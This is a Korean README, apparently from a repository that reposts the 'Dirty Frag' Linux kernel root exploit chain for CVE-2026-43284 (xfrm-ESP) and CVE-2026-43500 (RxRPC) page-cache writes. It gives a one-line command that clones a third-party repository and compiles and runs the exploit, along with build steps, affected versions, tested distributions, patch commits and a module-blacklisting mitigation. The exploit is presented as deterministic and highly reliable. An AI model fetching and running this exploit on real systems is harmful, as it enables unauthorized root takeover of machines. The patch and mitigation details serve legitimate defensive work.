
Linux 커널 익스플로잇 체인(CVE-2026-43284 및 CVE-2026-43500)으로, xfrm-ESP 및 RxRPC 페이지 캐시 쓰기 취약점을 통해 root 권한을 획득합니다.
Linux CVE-2026-43284 & CVE-2026-43500
@V4bel 님으로부터 복사했습니다 :) 감사합니다 :)
이 문서는 Hyunwoo Kim(@v4bel)이 최초로 발견하고 보고한 Dirty Frag 취약점 클래스를 설명하며, 이는 xfrm-ESP Page-Cache Write(CVE-2026-43284) 취약점과 RxRPC Page-Cache Write(CVE-2026-43500) 취약점을 연쇄하여 주요 Linux 배포판에서 root 권한을 획득할 수 있습니다.
Dirty Frag는 Dirty Pipe와 Copy Fail이 속한 버그 클래스를 확장한 사례입니다. 타이밍 윈도우에 의존하지 않는 결정론적 로직 버그이기 때문에 경쟁 조건(race condition)이 필요하지 않고, 익스플로잇이 실패해도 커널이 패닉하지 않으며, 성공률이 매우 높습니다.
자세한 기술 정보와 타임라인은 여기에서 확인하세요.
xfrm-ESP Page-Cache Write(CVE-2026-43284)는 메인라인 f4c50a4034e6에서 패치되었습니다.
RxRPC Page-Cache Write(CVE-2026-43500)는 메인라인 aa54b1d27fe0에서 패치되었습니다.
익스플로잇 : 승인된 작업에서만 실행하세요 !!
한 줄 명령: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
단계별 :
먼저 익스플로잇을 컴파일한 다음 바이너리를 실행합니다
gcc -O0 -Wall -o exp exp.c -lutil
./exp
!! 정리
⚠️ 중요: 이 익스플로잇을 실행한 후에는 페이지 캐시가 오염됩니다. 오염된 페이지 캐시를 정리하고 시스템 안정성을 보장하려면 다음 중 하나를 실행하세요:
echo 3 > /proc/sys/vm/drop_caches
또는 시스템을 재부팅하세요. 영향받는 버전
CVE-2026-43284: xfrm-ESP Page-Cache Write 취약점은 cac2661c53f3(2017-01-17)부터 f4c50a4034e6(2026-05-05)까지 해당됩니다.
CVE-2026-43500: RxRPC Page-Cache Write 취약점은 2dc334f1a63a(2023-06-08)부터 aa54b1d27fe0(2026-05-10)까지 해당됩니다.
즉, 취약점의 실질적인 수명은 약 9년입니다.
이 Dirty Frag는 다음 배포판 버전에서 테스트되었습니다.
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...
완화 조치
다음 명령을 사용하여 취약점이 발생하는 모듈을 제거하고 페이지 캐시를 정리하세요.
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
각 배포판이 패치를 백포트하면 그에 맞게 업데이트하세요.